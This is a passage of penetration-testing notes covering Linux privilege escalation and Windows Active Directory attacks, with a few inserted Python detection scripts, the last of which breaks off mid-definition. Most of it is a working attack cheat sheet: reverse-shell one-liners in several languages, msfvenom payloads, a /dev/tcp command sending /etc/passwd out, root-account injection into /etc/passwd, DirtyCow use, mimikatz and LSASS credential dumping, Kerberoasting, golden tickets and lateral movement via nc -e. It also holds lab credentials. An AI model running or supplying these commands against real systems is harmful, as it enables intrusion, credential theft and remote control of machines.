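            findings.append((entry, "missing directory: whoever can create it controls lookups"))
        elif mode & stat.S_IWOTH and mode & stat.S_ISVTX:
            # Sticky bit protects existing files, but new names (like "ps") can be planted.
            findings.append((entry, "world-writable sticky directory: new names can be planted"))
        elif mode & stat.S_IWOTH:
            findings.append((entry, "world-writable directory"))
    return findings


def collect_path_entries(path_value):
    """Stat each PATH component of the running system into judge_entries() tuples."""
    out = []
    for entry in path_value.split(os.pathsep):
        try:
            st = os.stat(entry) if entry else None
        except OSError:
            st = None
        out.append((entry, st.st_mode if st else None, bool(st) and stat.S_ISDIR(st.st_mode)))
    return out


def audit_path(path_value=None):
    """Audit the given PATH string, or the current process's PATH if None."""
    if path_value is None:
        path_value = os.environ.get("PATH", "")
    return judge_entries(collect_path_entries(path_value))


# Constructed sample: (entry, st_mode, is_dir) as os.stat would report them.
CONSTRUCTED = [
    ("/tmp", 0o41777, True),
    ("/usr/local/bin", 0o40755, True),
    (".", None, False),
    ("bin", None, False),
    ("/opt/shared", 0o40777, True),
    ("/nonexistent", None, False),
]

if __name__ == "__main__":
    for entry, reason in judge_entries(CONSTRUCTED):
        print(entry, "->", reason)
    print("live PATH findings:", audit_path())
```

The companion check on the privileged side is the binary itself: a setuid program that calls `ps` rather than `/bin/ps`, or that does not reset PATH before calling it, is what turns a writable directory into root.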

mail

cat /var/spool/mail/*

crontab

cat /etc/crontab
ls -la /var/spool/cron/
ls -la /tmp
crontab -e

Commands run by crontab are generally hard to catch with ps, unless you happen to run ps while the command is executing.
That works for long-running commands or scripts that loop, but it is hopeless for commands that finish almost instantly.
pspy can be used to monitor background processes continuously.
https://github.com/DominicBreuker/pspy

  • crontab entries are usually set to run on the minute, so the command pspy shows in the first second of each minute is the crontab content
  • Directory permissions
    • r: list the directory contents
    • w: create and delete files in the directory, rename files
    • x: enter the directory and operate on the files inside it
    • r--: files in the directory can be listed without entering it, but their details cannot be viewed
    • --x: a known file can be listed individually and its details viewed

Writable passwd

ls -l /etc/passwd

openssl passwd -6 hackforfun
$6$niT81cP.pbbCDVBZ$Tnou8n5zZHkPNF3n0EqZnouOM4eEDCxSS5OeJ21.TbLJe167Igyns87G8JbW2n5ShI23D9RuGtji1NLrRti./1
echo 'test:$6$niT81cP.pbbCDVBZ$Tnou8n5zZHkPNF3n0EqZnouOM4eEDCxSS5OeJ21.TbLJe167Igyns87G8JbW2n5ShI23D9RuGtji1NLrRti./1:0:0::/root:/bin/bash' >> /etc/passwd
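The writable-passwd trick above leaves two traces, a second UID 0 account and a hash sitting in passwd rather than shadow, and the hash table in the Passwords section earlier tells you which scheme a shadow hash uses and how cheap it is to crack. The following added example (not code from the original notes) audits passwd/shadow content for both. The sample lines are constructed; the sha512 hashes are placeholders, and the md5crypt hash is the one from the Passwords section.

```python
# Added example (not from the original notes): audit /etc/passwd and
# /etc/shadow contents for what the two sections above exploit: a second UID 0
# account, a hash planted directly in passwd, an empty password field, and
# weak hash schemes, mapped to the hashcat/john modes from the table above.
# The sample lines are constructed; the long hashes are placeholders.
HASH_SCHEMES = {
    "$1$": ("md5crypt", 500, "md5crypt-long"),
    "$2": ("bcrypt", 3200, "bcrypt"),
    "$5$": ("sha256crypt", 7400, "sha256crypt"),
    "$6$": ("sha512crypt", 1800, "sha512crypt"),
}
WEAK_SCHEMES = {"md5crypt"}

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
test:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:0:0::/root:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:18563:0:99999:7:::
daemon:*:18563:0:99999:7:::
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:18563:0:99999:7:::
guest::18563:0:99999:7:::
"""


def identify_hash(field):
    """Return (scheme, hashcat_mode, john_format), or None for a locked/no-hash field."""
    if field in ("", "x", "*") or field.startswith("!"):
        return None
    for prefix, scheme in HASH_SCHEMES.items():
        if field.startswith(prefix):
            return scheme
    return ("unknown", None, None)


def audit_passwd(passwd_text, shadow_text=""):
    """Return [(file, account, reason)] findings over passwd and shadow content."""
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("passwd", line, "malformed entry"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append(("passwd", name, "extra UID 0 account"))
        if pw == "":
            findings.append(("passwd", name, "empty password field (no password needed)"))
        elif pw != "x":
            scheme = identify_hash(pw)
            if scheme:  # a real hash in passwd bypasses shadow's root-only protection
                findings.append(("passwd", name, "%s hash stored in passwd instead of shadow" % scheme[0]))
    for line in shadow_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            findings.append(("shadow", line, "malformed entry"))
            continue
        name, pw = fields[0], fields[1]
        if pw == "":
            findings.append(("shadow", name, "empty password field"))
            continue
        scheme = identify_hash(pw)
        if scheme and scheme[0] in WEAK_SCHEMES:
            findings.append(("shadow", name, "weak %s hash (hashcat -m %d)" % (scheme[0], scheme[1])))
        elif scheme and scheme[0] == "unknown":
            findings.append(("shadow", name, "unrecognised hash format"))
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(finding)
```

Run against a live system, the interesting signal is any change in the UID 0 set between two runs; `ls -l /etc/passwd` showing group or world write permission is the condition that makes the change possible in the first place.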

Privilege escalation via system vulnerabilities

Ubuntu 18.10
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 LTS
2.28 < snapd < 2.37
Network connectivity
  • DirtyCow
git clone https://github.com/dirtycow/dirtycow.github.io
cd dirtycow.github.io
gcc dirtyc0w.c -o dirtycow -pthread
./dirtycow /etc/group "$(sed '/\(sudo*\)/ s/$/,test/' /etc/group)"
sudo su
  • 40616.c

File transfer

  • FTP
  • SCP
  • HTTP
    • python2 -m SimpleHTTPServer 80 &
    • python3 -m http.server 80&
  • TCP Socket
    • nc -lvnp 9999
    • bash -c 'exec 3<>/dev/tcp/127.0.0.1/9999; cat /etc/passwd >&3; exec 3>&-'

Internal network proxying

  • meterpreter (socks4)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2020 -f raw > shell.php
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2020 -f elf > shell.elf
use auxiliary/server/socks4a

# frpc.ini
[common]
server_addr = 192.168.56.104
server_port = 7000

[sock5_1]
type = tcp
remote_port = 45555
plugin = socks5
plugin_user = user
plugin_passwd = pass
#####################
# frps.ini
[common]
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pass = admin

Using lcx together with meterpreter for a reverse shell across the public network:
on Server run lcx -listen 8888 9999
locally run lcx -slave Server 8888 Local_IP 7777
and have MSF listen on port 7777 of Local_IP
(note that 127.0.0.1 cannot be used here)
meterpreter on the target connects back to port 8888 on Server
  • proxychains
  • proxifier
  • sockscap
  • socat
    • socat tcp-listen:1234,fork tcp-connect:localhost:8080
  • plink
    • plink.exe -ssh root@192.168.0.1 -pw password -R 1234:127.0.0.1:3306
  • sshuttle
  • SSH
    • LOCAL & REMOTE & SOCKS

Shell

  • nc
nc.traditional is the oldest version (v1.10-41.1); it has the ``-e`` option, which makes it very convenient for reverse shells
On Ubuntu the nc command points to netcat-openbsd, which has no ``-e`` option and cannot be used for a reverse shell that way
ncat is the newer one, bundled with nmap

# bind shell
nc -lvvp 8080 -t -e /bin/bash
.............................
nc 192.168.0.1 8080

/bin/bash -i 2>&1 | nc 192.168.0.1 8080
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.0.1 8080 >/tmp/f
nc -e /bin/bash 192.168.0.1 8080
.............................
nc -lvnp 8080
  • bash
bash -i >& /dev/tcp/192.168.0.1/8080 0>&1
.............................
nc -lvnp 8080
  • python
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.1',8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
  • php
php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.0.1/8080 0>&1")'
php -r '$sock=fsockopen("192.168.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
  • perl
perl -e 'use Socket;$i="192.168.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.1","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e'f=TCPSocket.open("192.168.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PowerShell

  • Separator for multiple commands / command injection: ;
  • Secure String
$password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)
$result

Windows

Information gathering

  • nmap
  • dirb
  • wfuzz
    • VHOST: wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://flight.htb" -H "Host: FUZZ.flight.htb" --hl 154
  • enum4linux
  • smbmap
    • smbmap -H 10.10.10.248 -u "test"
    • smbmap -H 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence
  • smbclient
    • smbclient //10.10.10.248/users -U Tiffany.Molina --password='NewIntelligenceCorpUser9876'
    • Download a whole directory
mask ""
recurse ON
prompt OFF
mget active.htb
  • kerbrute
kerbrute userenum -dc-ip 10.10.10.248 -d intelligence.htb users
  • bloodhound
bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc pathfinder.megacorp.local -c all -ns 10.10.10.30
neo4j console
bloodhound

curl https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1 -O
curl https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -O
invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
  • lookupsid
python lookupsid.py sql_svc:REGGIE1234ronnie@10.10.11.202
  • pywerview
python3 pywerview.py get-netcomputer -u svc_int$ --hashes 47e89a6afd68e3872ef1acaf91d0b2f7 -d intelligence.htb -t dc.intelligence.htb --full-data
  • procdump
./procdump64.exe -accepteula -ma 6216

get-aduser -filter * -server $dc_domain_name | format-table name,samaccountname -a
get-aduser -identity $username -server $dc_domain_name -properties *
get-adgroup -filter * -server $dc_domain_name | format-table name -a
get-adgroup -identity $groupname -server $dc_domain_name
get-adgroupmember -identity $groupname -server $dc_domain_name
get-adobject
get-addomain -server $dc_domain_name
  • powerview
get-domain
get-domaincontroller
get-forestdomain
get-domaintrust

get-domainuser
get-domaincomputer
get-domaingroup
get-domaingroupmember
get-domainou

get-domaingpo
get-domaingpolocalgroup
get-domaingpouserlocalgroupmapping

Brute forcing

  • Brute-force SMB
    crackmapexec smb 10.10.10.248 -d intelligence -u user -p NewIntelligenceCorpUser9876 --continue-on-success
  • Brute-force WinRM
    crackmapexec winrm 10.10.10.149 -d heist -u user -p pass

Obtaining credentials

gMSADumper

wget https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248

allowed_to_delegate_to

python3 pywerview.py get-netcomputer -u svc_int$ --hashes 47e89a6afd68e3872ef1acaf91d0b2f7 -d intelligence.htb -t dc.intelligence.htb --full-data
python3 getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate administrator
export KRB5CCNAME=administrator.ccache
python3 secretsdump.py -k dc.intelligence.htb -just-dc

GPP

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

PortableKanban

#!/usr/bin/env python3
import base64
from des import DesKey  # python3 -m pip install des


def decode(hash):
    # PortableKanban stores passwords as base64(DES-CBC(plaintext)) with a fixed key and IV
    hash = base64.b64decode(hash.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    return key.decrypt(hash, initial=b"XuVUm5fR", padding=True).decode('utf-8')


print(decode("Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi"))

mimikatz

SAM

privilege::debug
token::elevate
lsadump::sam

LSASS

privilege::debug
token::elevate
sekurlsa::msv

LOGGED

privilege::debug
token::elevate
sekurlsa::logonPasswords

REGISTRY

privilege::debug
token::elevate
lsadump::secrets

KERBEROS_KEYS

privilege::debug
sekurlsa::ekeys

KERBEROS_TICKETS

privilege::debug
sekurlsa::tickets /export
kerberos::ptt $ticket_file

PASS_THE_KEY

privilege::debug
sekurlsa::ekeys
sekurlsa::pth /user:$username /domain:$domain /rc4:$rc4 /run:"nc64.exe -e cmd.exe $ip $port"
sekurlsa::pth /user:$username /domain:$domain /aes128:$aes128 /run:"nc64.exe -e cmd.exe $ip $port"
sekurlsa::pth /user:$username /domain:$domain /aes256:$aes256 /run:"nc64.exe -e cmd.exe $ip $port"

Kerberoasting

TGS_Ticket = RC4-HMAC(Plain = Timestamp, Key = Server_NTLM)
The plaintext format is fixed and known: enumerate candidate keys and decrypt the TGS ticket; when the decrypted format matches, the key is Server_NTLM

  • Usually used against service accounts
python GetUserSPNs.py -dc-ip $ip $domain/$user:$password -request
python GetUserSPNs.py -dc-ip $ip $domain/$user:$password -request-user $spn_user -save -outfile tgs
hashcat -m 13100 tgs /usr/share/wordlists/rockyou.txt

. .\invoke-kerberoast
invoke-kerberoast -outputformat hashcat
  • Rubeus
.\Rubeus.exe kerberoast /simple /nowrap
.\Rubeus.exe kerberoast /user:mssql_svc /nowrap

AS-REP Roasting

Typically that requires credentials on the domain to authenticate with. There is an option for an account to have the property “Do not require Kerberos preauthentication” or UF_DONT_REQUIRE_PREAUTH set to true. AS-REP Roasting is an attack against Kerberos for these accounts.
https://0xdf.gitlab.io/2020/03/21/htb-forest.html#as-rep-roasting

  • Username required
python GetNPUsers.py -dc-ip $ip $domain/$username:$password -request -outfile tgt
python GetNPUsers.py -dc-ip $ip $domain/ -usersfile $user_file -request -outfile tgt
hashcat -m 18200 tgt /usr/share/wordlists/rockyou.txt
  • Rubeus
.\Rubeus.exe asreproast /user:squid_svc /nowrap
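Both roasting techniques above leave a distinctive trace on the domain controller: Kerberoasting shows up as event 4769 (TGS request) with the RC4 encryption type 0x17 for a user-owned SPN, and AS-REP roasting as event 4768 (TGT request) with Pre-Authentication Type 0. The following added example (not code from the original notes) applies those two rules to a batch of events. It assumes the events have already been parsed into dicts with the standard field names; the events themselves are constructed, and the service-account names reuse the ones from the commands above.

```python
# Added example (not from the original notes): flag Kerberoasting and AS-REP
# roasting activity in domain-controller security events. Events are assumed
# to be pre-parsed dicts carrying the fields of event 4769 (TGS request) and
# 4768 (TGT request); the events below are constructed. Account names reuse
# the service-account names from the commands above.
from collections import Counter

RC4_HMAC = "0x17"  # encryption type the tools above request; AES is 0x11/0x12
SUCCESS = "0x0"

SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "mssql_svc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.20", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "squid_svc", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "PreAuthType": "0", "IpAddress": "10.10.14.5", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "jdoe", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "PreAuthType": "2", "IpAddress": "10.10.10.30", "Status": "0x0"},
]


def detect_roasting(events):
    """Return {"kerberoast": [...], "asrep": [...], "rc4_by_ip": Counter}."""
    kerberoast, asrep, rc4_by_ip = [], [], Counter()
    for e in events:
        if e.get("Status") != SUCCESS:
            continue  # failed requests yield no crackable material
        rc4 = e.get("TicketEncryptionType") == RC4_HMAC
        if rc4:
            rc4_by_ip[e.get("IpAddress")] += 1
        svc = e.get("ServiceName", "")
        # 4769 + RC4 for a user-owned SPN (not a machine account, not krbtgt) is
        # the classic Kerberoast signature; machine accounts default to AES.
        if e.get("EventID") == 4769 and rc4 and not svc.endswith("$") and svc.lower() != "krbtgt":
            kerberoast.append((e.get("TargetUserName"), svc, e.get("IpAddress")))
        # 4768 with Pre-Authentication Type 0 means the account has
        # DONT_REQ_PREAUTH set, which is exactly what AS-REP roasting needs.
        if e.get("EventID") == 4768 and e.get("PreAuthType") == "0":
            asrep.append((e.get("TargetUserName"), e.get("IpAddress")))
    return {"kerberoast": kerberoast, "asrep": asrep, "rc4_by_ip": rc4_by_ip}


if __name__ == "__main__":
    result = detect_roasting(SAMPLE_EVENTS)
    print("kerberoast:", result["kerberoast"])
    print("asrep:", result["asrep"])
    print("rc4 requests per source:", dict(result["rc4_by_ip"]))
```

A source address that accounts for many RC4 requests in a short window is the usual follow-up query; the mitigation on the account side is long random service-account passwords (or gMSAs) and AES-only encryption types, which removes the cheap RC4 crack entirely.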

Obtaining credentials of running programs and service accounts

Listeners

  • responder
responder -I tun0 -A
  • smbserver
python smbserver.py -ip 10.10.*.* -smb2support BFL /tmp
  • rogue ldap server
sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd
echo -e "#olcSaslSecProps.ldif\ndn: cn=config\nreplace: olcSaslSecProps\nolcSaslSecProps: noanonymous,minssf=0,passcred" > olcSaslSecProps.ldif
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
sudo tcpdump -SX -i breachad tcp port 389

Services

  • Invoke-WebRequest

Requests port 80 of the web* hostnames in the domain

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200)
        {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    }
    catch {}
}

Forging a DNS name

wget https://raw.githubusercontent.com/dirkjanm/krbrelayx/master/dnstool.py
python3 dnstool.py -u "intelligence.htb\Tiffany.Molina" -p NewIntelligenceCorpUser9876 --action add -r webbufferfly.intelligence.htb -d 10.10.*.* 10.10.10.248
  • MSSQL
python mssqlclient.py PublicUser:GuestUserCantWrite1@10.10.11.202
exec master.dbo.xp_dirtree '\\10.10.*.*\BFL'
  • RFI
<?php
// [2] include(/header.inc): failed to open stream: No such file or directory On line 36 in file C:\inetpub\wwwroot\functions.php
// Following function securely includes a file. Whenever we
// will encounter a PHP tag we will just bail out here.
function secure_include($file) {
    if (strpos(file_get_contents($file),'<?') === false) {
        include($file); //<<<<< Error encountered in this line.
    } else {
        http_response_code(403);
        die('Forbidden - Tampering attempt detected.');
    }
}
?>
curl http://10.10.10.231/licenses/licenses.php?theme=//10.10.*.*&h=b1a3d9ecf02d4854f3a730f8b2a9af5d
  • desktop.ini

https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini

[.ShellClassInfo]
IconResource=\\10.10.*.*\BFL

Cracking NTLMv2

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt

Windows Credential Manager

  • Web Credential

https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-WebCredentials.ps1

vaultcmd /list
vaultcmd /listproperties:"Web Credentials"
vaultcmd /listcreds:"Web Credentials"
. .\Get-WebCredentials.ps1
Get-WebCredentials
  • Windows Credential
cmdkey /list
runas /savecred /user:$user cmd.exe
  • mimikatz
sekurlsa::credman

LAPS

dir "c:\program files\laps\admpwd.dll"
find-admpwdextendedrights -identity *
get-admpwdpassword -computername *

SAM

  • SAM c:\windows\system32\config\sam
  • SYSTEM c:\windows\system32\config\system
  • Meterpreter
    • hashdump
  • Volume Shadow Copy
# The copy out of the shadow copy must be done from cmd, not PowerShell
wmic shadowcopy call create volume="c:\"
vssadmin list shadows
copy \\?\globalroot\device\harddiskvolumeshadowcopy1\windows\system32\config\sam .\sam
copy \\?\globalroot\device\harddiskvolumeshadowcopy1\windows\system32\config\system .\system
  • Registry
reg save hklm\sam .\sam
reg save hklm\system .\system
reg save hklm\security .\security
  • python secretsdump.py local -system /tmp/SYSTEM -sam /tmp/SAM

NTDS.DIT

mkdir ntds
ntdsutil "ac i ntds" "ifm" "create full .\ntds" q q

LSASS

  • Memory Dump
    • taskmgr
    • mimikatz
sekurlsa::logonpasswords
  • Protected LSASS
    • reg
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /f RunAsPPL
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 0 /f
  • mimikatz
    (mimidrv.sys)
!+
!processprotect /process:lsass.exe /remove
sekurlsa::logonpasswords

GetShell / Lateral movement

  • Consider combining with Pass the Hash or Pass the Ticket
  • psexec
    • Needs write access to the ADMIN$ share
    • impacket-psexec $domain/$username:$password@$ip
  • evil-winrm
    • evil-winrm -i $ip -u $username -p $password
  • ssh
  • mssql
python mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
enable_xp_cmdshell
xp_cmdshell whoami
  • mssql links
.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"select srvname, srvproduct, rpcout from master..sysservers"

srvname             | srvproduct | rpcout |
--------------------------------------------
SQL-2               | SQL Server | True   |
SQL-1.CYBERBOTIC.IO | SQL Server | True   |

.\Sqlrecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:query /c:"select * from openquery(\"sql-1.cyberbotic.io\", 'select @@servername')"

column0 |
----------
SQL-1   |

runas /netonly /user:$domain\$username "nc64.exe -e cmd.exe $hostname $port"
$password
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=$port -f exe-service -o bfl.exe
smbclient -c "put bfl.exe" -U $username -W $domain "//$ip/admin$/" $password
sc \\$ip create bflservice binpath="c:\windows\bfl.exe"
sc \\$ip start bflservice
  • schtasks
    • runas is used to spawn a shell that carries the target user's token
runas /netonly /user:$domain\$username "nc64.exe -e cmd.exe $ip $port"
$password
schtasks /s $ip /ru "system" /create /tn "bfltask" /tr "nc.exe -e cmd.exe $ip $port" /sc once /sd 01/01/1970 /st 00:00
schtasks /s $ip /run /tn "bfltask"
  • VBS
CreateObject("WScript.Shell").Run "nc64.exe -e cmd.exe $ip $port", 0, True
  • RDP Hijacking

When an administrator uses Remote Desktop to connect to a machine and closes the RDP client instead of logging off, his session will remain open on the server indefinitely. If you have SYSTEM privileges on Windows Server 2016 and earlier, you can take over any existing RDP session without requiring a password.
Windows Server 2019 won’t allow you to connect to another user’s session without knowing its password.

psexec64.exe -s cmd.exe
query user

 USERNAME          SESSIONNAME   ID  STATE   IDLE TIME  LOGON TIME
>administrator     rdp-tcp#6      2  Active  .          4/1/2022 4:09 AM
 luke                             3  Disc    .          4/6/2022 6:51 AM

tscon 3 /dest:rdp-tcp#6

Domain Trusts

Parent/Child

SID-History Injection

Use child-domain admin rights to obtain parent-domain admin rights (WITHIN_FOREST & Bidirectional)

The username must be one from the child domain, sid is the child domain's SID, and sids can be either the parent domain administrator or the parent Domain Admins group; the ticket's rights in the parent domain come from sids

.\Rubeus.exe golden /user:nlamb /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /sids:S-1-5-21-2594061375-675613155-814674916-500

Inbound

Group members from outside the domain

get-domaintrust
get-domain -domain dev-studio.com
get-domainforeigngroupmember -domain dev-studio.com
get-domaingroupmember -identity "studio admins"

.\Rubeus.exe asktgt /domain:dev.cyberbotic.io /user:nlamb /aes256:a779fa8afa28d66d155d9d7c14d394359c5d29a86b6417cb94269e2e84c4cee4
.\Rubeus.exe asktgs /service:krbtgt/dev-studio.com /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:$ticket
.\Rubeus.exe asktgs /service:cifs/dc.dev-studio.com /domain:dev-studio.com /dc:dc.dev-studio.com /ticket:$ticket

Outbound

The inbound domain holds a trust account for the outbound domain

get-domaintrust
get-domainObject | where-object { $_.cn -eq 'msp.org' }
.\Mimikatz lsadump::dcsync /domain:cyberbotic.io /guid:{b93d2e36-48df-46bf-89d5-2fc22c139b43}
.\Rubeus.exe asktgt /domain:msp.org /user:CYBER$ /rc4:fe4dea093e0a56af8a6667ba69f27c28

Tickets

$sid is the domain SID

Golden Tickets

kerberos::golden /sid:$sid /domain:$domain /user:$username /krbtgt:$krbtgt_ntlm /ptt

Silver Tickets

kerberos::golden /sid:$sid /domain:$domain /target:$hostname /service:$service /rc4:$ntlm /user:$username /ptt

Unconstrained Delegation

TRUSTED_FOR_DELEGATION

In the background, if a user with the “TRUSTED_FOR_DELEGATION” flag set authenticates to a host with Unconstrained Delegation configured, a ticket-granting ticket (TGT) for that user account is generated and stored in memory so it can be used later if needed.

get-netcomputer -unconstrained
rubeus klist
rubeus dump /luid:0x14b3e9 /nowrap
rubeus createnetonly /program:c:\windows\system32\cmd.exe /domain:dev.cyberbotic.io /username:nlamb /password:fake /ticket:$ticket
  • Rubeus & Sharpspooltrigger
.\Rubeus.exe monitor /interval:10 /nowrap
.\Sharpspooltrigger.exe dc-2.cyberbotic.io web.cyberbotic.io

Constrained Delegation

curl https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -O
. .\PowerView.ps1
get-netuser -trustedtoauth
get-netcomputer -trustedtoauth

With the TGT (or key) of the account that has constrained delegation configured, run S4U2Self + S4U2Proxy to impersonate a user to the SPNs listed in its msds-allowedtodelegateto:

.\Rubeus.exe s4u /impersonate:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$ /nowrap /ticket:$ticket

msds-allowedtodelegateto

The attribute lists the SPNs the delegating account may request tickets for. The same flow without Rubeus:

mimikatz (dump the delegating service account's secret from the host you control)

privilege::debug
token::elevate
lsadump::secrets

kekeo

tgt::ask /user:$user /domain:$domain /password:$password
tgs::s4u /tgt:$tgt_file /user:$user /service:$service/$hostname

mimikatz

privilege::debug
kerberos::ptt $tgs_file

http + wsman -> PowerShell remoting: a service ticket for http (or wsman) on the target is what WinRM needs, so after ptt:

New-PSSession -ComputerName $hostname
Enter-PSSession -ComputerName $hostname

Alternate Service Name

The sname in a service ticket is not part of the encrypted ticket body, and every service that runs under the same account on a host is protected by that one long-term key. A ticket obtained for one of these SPNs can therefore be rewritten for any other on the same host without knowing the key; it cannot be retargeted to a different host, whose account has a different key.

  • HOST
  • RPCSS
  • HTTP
  • WSMAN
  • WINRM
  • CIFS
  • LDAP

.\Rubeus.exe tgssub /altservice:cifs /ticket:$ticket
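Why the substitution works, as an added Python model that is not part of the original notes and uses no real Kerberos cryptography: the ticket's sname is carried in the clear and only the enc-part is bound to the service account's key, so rewriting the service class on the same host passes while pointing the ticket at another host fails. A SHA-256 keystream plus HMAC stands in for the Kerberos cipher, and the host names and keys are made up.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Dict, Optional

# Toy cipher standing in for Kerberos ticket encryption (NOT Kerberos crypto):
# SHA-256 counter-mode keystream plus an HMAC tag over nonce||ciphertext.
def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]

def encrypt(key: bytes, plaintext: bytes) -> bytes:
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()

def decrypt(key: bytes, blob: bytes) -> bytes:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        raise ValueError("enc-part was not produced with this service key")
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))

@dataclass
class Ticket:
    sname: str       # RFC 4120 Ticket.sname: plaintext, outside the encrypted part
    enc_part: bytes  # EncTicketPart under the long-term key of the SPN's owner

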